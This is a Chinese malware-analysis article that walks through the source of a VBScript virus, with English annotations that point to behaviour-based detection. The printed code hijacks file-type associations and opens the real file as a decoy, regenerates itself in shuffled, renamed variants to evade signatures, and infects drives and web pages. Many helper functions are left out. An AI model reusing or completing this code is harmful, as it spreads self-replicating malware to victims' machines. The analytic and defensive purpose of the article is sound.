按照我得到的样本中代码顺序分上中下剖析代码:
病毒主要用到的是Wscript.Shell 对象,所以运行的时候任务管理器里都有Wscript.exe程序的进程的...
作者:论坛整理 来源:zdnet网络安全 2007年12月24日
关键字: 安全 病毒防范 病毒
按照我得到的样本中代码顺序分上中下剖析代码:
病毒主要用到的是Wscript.Shell 对象,所以运行的时候任务管理器里都有Wscript.exe程序的进程的...
//删除注册表键值函数
Sub DeleteReg(strkey)
//Helper: deletes the registry key or value named by strkey through the WScript.Shell COM object.
//Note: the "//" lines throughout this listing are the article's annotations, not VBScript
//comments (VBScript uses ' or Rem), so the sample does not run exactly as printed.
//No error handling here: a missing key makes RegDelete raise a runtime error unless the
//caller has On Error Resume Next in effect.
Dim tmps
Set tmps = CreateObject("WScript.Shell")
//RegDelete removes the named key or value from the registry (a trailing "\" in strkey names a key, otherwise a value)
tmps.RegDelete strkey
Set tmps = Nothing
End Sub
//读注册表键值函数
Function ReadReg(strkey)
//Helper: returns the value stored at registry path strkey through WScript.Shell.RegRead.
//RegRead raises a runtime error when the key or value does not exist; nothing here catches
//it, so callers need their own error handling (under On Error Resume Next the function
//result is simply left Empty).
Dim tmps
Set tmps = CreateObject("WScript.Shell")
//RegRead returns the named value, or the default value of the named key
ReadReg = tmps.RegRead(strkey)
Set tmps = Nothing
End Function
//写注册表键值函数
Sub WriteReg(strkey, Value, vtype)
//Helper: writes Value to registry path strkey through WScript.Shell.RegWrite.
//vtype is the registry value type (e.g. "REG_SZ", "REG_DWORD"); an empty string selects the
//two-argument form, which lets RegWrite choose the type from the data.
//Which keys the sample actually writes is decided by the callers (not shown in this part);
//WScript.Shell registry writes from a .vbs are a common persistence / file-association
//primitive and are a good thing to alert on.
Dim tmps
Set tmps = CreateObject("WScript.Shell")
If vtype = "" Then
//RegWrite without a type: creates or overwrites the key or value with the default type
tmps.RegWrite strkey, Value
Else
//RegWrite with an explicit value type
tmps.RegWrite strkey, Value, vtype
End If
Set tmps = Nothing
End Sub
//VBS病毒体程序
Sub ExeVbs_Virus()
//Entry point of the sample. It dispatches on the last three characters of the command line:
//"run" (launched via a drive autorun), "txt"/"log"/"reg"/"chm"/"hlp" (launched as the
//handler of a file the user opened -- it opens the real file with the normal program as a
//decoy, then re-installs and relaunches itself), or anything else (normal launch: read the
//"<command>@<parameter>" string from its .ini file and infect, show a message, or uninstall).
//These file-type branches only make sense if the sample has registered itself as the handler
//for those extensions; that registry work is not in this part (presumably InvadeSystem).
//Names used but not defined here -- GetFSOName, Run, GetSelfCode, GetMainBody, VirusHead,
//WebHead, VictimHead, ChangeModelOrder, ChangeName, InvadeSystem, MonitorSystem, SearchDrives,
//RestoreSystem, PreInstance, IsOK, ReadOK, WriteOK, and the globals Head_V, Tail_V, Version,
//Sum_ModelCode, FullPath_V1, FullPath_Config, Cnt -- live in other parts of the sample.
//Note: the "//" lines are the article's annotations, not VBScript comments (VBScript uses '
//or Rem), and the curly quotes used as trailing comment markers are mis-encoded apostrophes.
//Suppress every runtime error for the whole routine (failing steps are silently skipped), then declare locals
On Error Resume Next
Dim objfso, objshell, FullPath_Self, Name_Self, Names
Dim oArgs, ArgNum, Para_V, SubPara_V, RunPath
Dim Order, Order_Order, Order_Para
Dim vbsCode , VbsCode_Virus, VbsCode_WebPage, VbsCode_Victim , MainBody
//Create the FileSystemObject for file and directory access. The ProgID comes from
//GetFSOName() (not shown) rather than a literal -- presumably to keep the string
//"Scripting.FileSystemObject" out of the file; confirm in that function.
Set objfso = CreateObject(GetFSOName())
//Create the WshShell object for registry and process access
Set objshell = CreateObject("WScript.Shell")
//Full path of the running script (WScript.ScriptFullName returns the complete path of the current script)
FullPath_Self = WScript.ScriptFullName
//File name of the running script (WScript.ScriptName returns the name of the WSF/VBS/JS file that was run)
Name_Self = WScript.ScriptName
//Module marker names used below; ChangeName (not shown) rewrites them in every generated copy.
//They match the ModelHead/ModelTail markers defined in the sample's global section.
Names = Array("ATRWZPCAQPMYT", "SXHBAKUUEZF")
//Collect the script's command-line arguments into one space-separated string
Set oArgs = WScript.Arguments
ArgNum = 0
//WScript.Arguments.Count is the number of arguments (e.g. files dropped onto the script)
//WScript.Echo WScript.Arguments(0) would print the full path of the first such file
Do While ArgNum < oArgs.Count
Para_V = Para_V & " " & oArgs(ArgNum)
ArgNum = ArgNum + 1
Loop
//Dispatch key: the last three characters of the argument string, lower-cased -- in practice
//the extension of the file that was passed in
SubPara_V = LCase(Right(Para_V, 3))
Select Case SubPara_V
//Started via AutoRun
Case "run"
//Drive letter of the script's own location, e.g. "E:" (first two characters of its full path)
RunPath = Left(FullPath_Self, 2)
//Open that drive (Run is not shown; presumably a shell launch) so the user sees the drive they double-clicked
Call Run(RunPath)
//Read this script's own source into vbsCode
vbsCode = GetSelfCode(objfso, FullPath_Self)
//Assemble a fresh copy: header, version line, virus-specific head, the shared main body, tail
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
//Shuffle the order of the code modules in the copy
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
//Rewrite the module marker names in the copy. Together with the shuffle above this makes
//every dropped copy differ textually, so byte-signature matching on the file is unreliable;
//detection is better keyed on behaviour (WScript.Shell registry writes, self-copy into
//system folders, <username>.vbs / <username>.ini file names).
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
//Check/refresh the installed main copy (InvadeSystem, not shown)
Call InvadeSystem(objfso, VbsCode_Virus)
//Launch the installed copy
Call Run(FullPath_V1)
//Started through the hijacked .txt / .log association
Case "txt", "log"
//Open the real file in Notepad as a decoy (note Para_V already starts with a space)
RunPath = "%SystemRoot%\system32\NOTEPAD.EXE " & Para_V
Call Run(RunPath)
//Same rebuild / reinstall / relaunch sequence as the "run" branch; it is repeated verbatim
//in the reg, chm and hlp branches below
vbsCode = GetSelfCode(objfso, FullPath_Self)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call InvadeSystem(objfso, VbsCode_Virus)
//Launch the installed virus file
Call Run(FullPath_V1)
//Started through the hijacked .reg association
Case "reg"
//Open the real .reg file with regedit.exe (path quoted) as a decoy
Para_V = "regedit.exe " & """" & Trim(Para_V) & """"
Call Run(Para_V)
vbsCode = GetSelfCode(objfso, FullPath_Self)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call InvadeSystem(objfso, VbsCode_Virus)
Call Run(FullPath_V1)
//Started through the hijacked .chm association
Case "chm"
//Open the real .chm file with hh.exe (HTML Help) as a decoy
Para_V = "hh.exe " & """" & Trim(Para_V) & """"
Call Run(Para_V)
vbsCode = GetSelfCode(objfso, FullPath_Self)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call InvadeSystem(objfso, VbsCode_Virus)
Call Run(FullPath_V1)
//Started through the hijacked .hlp association
Case "hlp"
//Open the real .hlp file with winhlp32.exe as a decoy
Para_V = "winhlp32.exe " & """" & Trim(Para_V) & """"
Call Run(Para_V)
vbsCode = GetSelfCode(objfso, FullPath_Self)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call InvadeSystem(objfso, VbsCode_Virus)
Call Run(FullPath_V1)
//Normal launch (no recognised suffix)
Case Else
//Exit if another instance is already running (PreInstance, not shown)
If PreInstance = True Then
WScript.Quit
End If
//Only proceed when IsOK (not shown) says so; it receives today's date and the config path,
//so it is presumably a date or "already done today" check -- confirm in that function
If IsOK(objfso, Date(), FullPath_Config) = False Then
//If the config (.ini) file already exists, read the stored command
If objfso.FileExists(FullPath_Config) = True Then
//The stored string has the form "<command>@<parameter>"; split it on the "@"
Order = Trim(ReadOK(objfso, FullPath_Config))
Order_Order = Trim(Mid(Order, 1, InStr(1, Order, "@") -1))
Order_Para = Trim(Mid(Order, InStr(1, Order, "@") + 1, Len(Order) - InStr(1, Order, "@")))
End If
//With no config file Order_Order is Empty and falls through to the Case Else below
Select Case Order_Order
//Command "InfectFiles": build all three variants and infect the drives
Case "InfectFiles"
vbsCode = GetSelfCode(objfso, FullPath_Self)
MainBody = GetMainBody(vbsCode, Sum_ModelCode)
//Variant written into web pages (WebHead) ...
VbsCode_WebPage = Head_V & Version & VBCRLF & WebHead() & MainBody & VBCRLF & Tail_V
VbsCode_WebPage = ChangeModelOrder(VbsCode_WebPage, Sum_ModelCode)
VbsCode_WebPage = ChangeName(VbsCode_WebPage, Names)
//... variant written into other victim files (VictimHead) ...
VbsCode_Victim = Head_V & Version & VBCRLF & VictimHead() & MainBody & VBCRLF & Tail_V
VbsCode_Victim = ChangeModelOrder(VbsCode_Victim, Sum_ModelCode)
VbsCode_Victim = ChangeName(VbsCode_Victim, Names)
//... and the stand-alone virus file (VirusHead)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
//Walk the drives; the last argument is 0 here and 1 in the KillVirus branch, so it
//presumably selects infect (0) vs. clean (1) -- SearchDrives is not shown
Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 0)
//Running total of infected files: stored count plus this pass's Cnt (a global updated elsewhere)
Order_Para = Order_Para + Cnt
//Past 2000 files, switch the stored command to "Msg" with the message text; otherwise store the new count
If Order_Para>2000 Then
Call WriteOK(objfso, FullPath_Config, "Msg", "您已有超过2000个文件被感染!不过请放心,此病毒很容易被清除!请联系418465***-_- !")
Else
Call WriteOK(objfso, FullPath_Config, "InfectFiles", Order_Para)
End If
Call InvadeSystem(objfso, VbsCode_Virus)
Call MonitorSystem(objfso, VbsCode_Virus)
//Command "Msg": show the stored text in a message box, clear the config, then reinstall and monitor
Case "Msg"
MsgBox Order_Para
Call WriteOK(objfso, FullPath_Config, "", "")
vbsCode = GetSelfCode(objfso, FullPath_Self)
MainBody = GetMainBody(vbsCode, Sum_ModelCode)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call InvadeSystem(objfso, VbsCode_Virus)
Call MonitorSystem(objfso, VbsCode_Virus)
//Command "UnLoadMe": built-in uninstall -- RestoreSystem (not shown) undoes the system changes, then exit
Case "UnLoadMe"
Call RestoreSystem(objfso)
Wscript.Quit
//Command "KillVirus": uninstall and also run SearchDrives in mode 1 to restore infected files.
//Note VbsCode_WebPage and VbsCode_Victim are never assigned on this path, so they are passed
//Empty; whether SearchDrives needs them in mode 1 cannot be seen here
Case "KillVirus"
Call RestoreSystem(objfso)
Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 1)
Wscript.Quit
//Any other command (including the no-config-file first run): spread
Case Else
vbsCode = GetSelfCode(objfso, FullPath_Self)
MainBody = GetMainBody(vbsCode, Sum_ModelCode)
VbsCode_WebPage = Head_V & Version & VBCRLF & WebHead() & MainBody & VBCRLF & Tail_V
VbsCode_WebPage = ChangeModelOrder(VbsCode_WebPage, Sum_ModelCode)
VbsCode_WebPage = ChangeName(VbsCode_WebPage, Names)
VbsCode_Victim = Head_V & Version & VBCRLF & VictimHead() & MainBody & VBCRLF & Tail_V
VbsCode_Victim = ChangeModelOrder(VbsCode_Victim, Sum_ModelCode)
VbsCode_Victim = ChangeName(VbsCode_Victim, Names)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 0)
//Initialise the config with the "InfectFiles" command and this pass's count
Call WriteOK(objfso, FullPath_Config, "InfectFiles", Cnt)
Call InvadeSystem(objfso, VbsCode_Virus)
Call MonitorSystem(objfso, VbsCode_Virus)
End Select
Else
//IsOK returned True: no infection this run, only rebuild the body and keep monitoring
vbsCode = GetSelfCode(objfso, FullPath_Self)
MainBody = GetMainBody(vbsCode, Sum_ModelCode)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V ’build the complete virus body
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode) ’change the module combination order
VbsCode_Virus = ChangeName(VbsCode_Virus, Names) ’change the module marker names
Call MonitorSystem(objfso, VbsCode_Virus)
End If
End Select
//Release the COM objects
Set objfso = Nothing
Set objshell = Nothing
End Sub
//病毒开始,排错并定义
//Global state of the sample, evaluated at script load before ExeVbs_Virus runs.
//GetUserName, GetSFolder and GetHeadTail are defined in parts not shown here.
//("//" lines are the article's annotations, not VBScript comments; the curly quotes used as
//trailing comment markers below are mis-encoded apostrophes.)
//Silently ignore runtime errors for the rest of the script
On Error Resume Next
Dim Cnt, CntMax, Version, Name_V1, FullPath_V0, FullPath_V1, FullPath_Config,Sum_ModelCode,Head_V,Tail_V
Dim ModelHead, ModelTail
//Running count of infected files (incremented elsewhere, read back in ExeVbs_Virus)
Cnt = 0
//Maximum number of files to infect; where it is enforced is not visible here (ExeVbs_Virus
//separately switches to the "Msg" command once the stored count exceeds 2000)
CntMax = 1000
//Version string written into every generated copy after the header
Version = "4"
//The dropped copy is named after the current Windows user name with a .vbs extension --
//a useful hunting pattern: <username>.vbs in the two folders GetSFolder(0)/(1) return
Name_V1 = GetUserName() & ".vbs"
FullPath_V0 = GetSFolder(0) & Name_V1 ’main executable copy: target of the file-association redirect
FullPath_V1 = GetSFolder(1) & Name_V1 ’main executable copy: runs the commands from the config file
//Config file: <username>.ini next to FullPath_V1, holding the "<command>@<parameter>"
//string that ExeVbs_Virus parses (InfectFiles / Msg / UnLoadMe / KillVirus)
FullPath_Config= GetSFolder(1) & GetUserName() & ".ini"
//Apparently the number of code modules; passed to GetMainBody and ChangeModelOrder when shuffling
Sum_ModelCode = 26
//Fixed header and trailer text of every generated copy
Head_V= GetHeadTail(0)
Tail_V= GetHeadTail(1)
//Module start/end marker lines. Each literal is an apostrophe-comment line in the generated
//copies; as printed here the apostrophe is mis-encoded as a curly quote. The names match
//the Names array in ExeVbs_Virus, which ChangeName rewrites per copy, so the markers are not
//a stable signature
ModelHead="’ATRWZPCAQPMYT"
ModelTail="’SXHBAKUUEZF"